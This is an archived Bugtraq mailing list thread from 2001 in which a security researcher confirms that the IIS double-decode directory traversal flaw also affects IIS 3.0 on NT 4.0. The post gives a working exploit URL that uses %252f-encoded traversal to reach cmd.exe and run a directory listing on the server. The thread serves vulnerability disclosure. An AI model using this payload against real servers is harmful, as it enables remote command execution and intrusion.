Bugtraq mailing list archives

IIS Decode

From: Aldo Albuquerque - Segurança de Sistemas <aldo () cesar org br>
Date: Thu, 17 May 2001 18:22:39 -0300

Yes!

I can confirm this . It worked on our testbed.

NT 4.0 + IIS 3.0 + SP6a

http://www.example.com/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cm
d.exe?/c+dir+c:\

Regards,

Aldo Albuquerque - CCSA
Tempest Security Technologies - http://www.tempest.com.br
CESAR - Centro de Estudos e Sistemas Avançados do Recife -
http://www.cesar.org.br



================================================================

----- Original Message -----
From: Michael Vassiliadis
To: bugtraq () securityfocus com
Sent: Thursday, May 17, 2001 12:52 AM
Subject: IIS Decode


There has been so much talk about this new "diamond" from m$, but NOONE
discovered that this also works on IIS 3!!!.....

Please confirm...

Current thread:

IIS Decode Michael Vassiliadis (May 17)
- Re: IIS Decode Brian (May 18)
- <Possible follow-ups>
- IIS Decode Aldo Albuquerque - Segurança de Sistemas (May 17)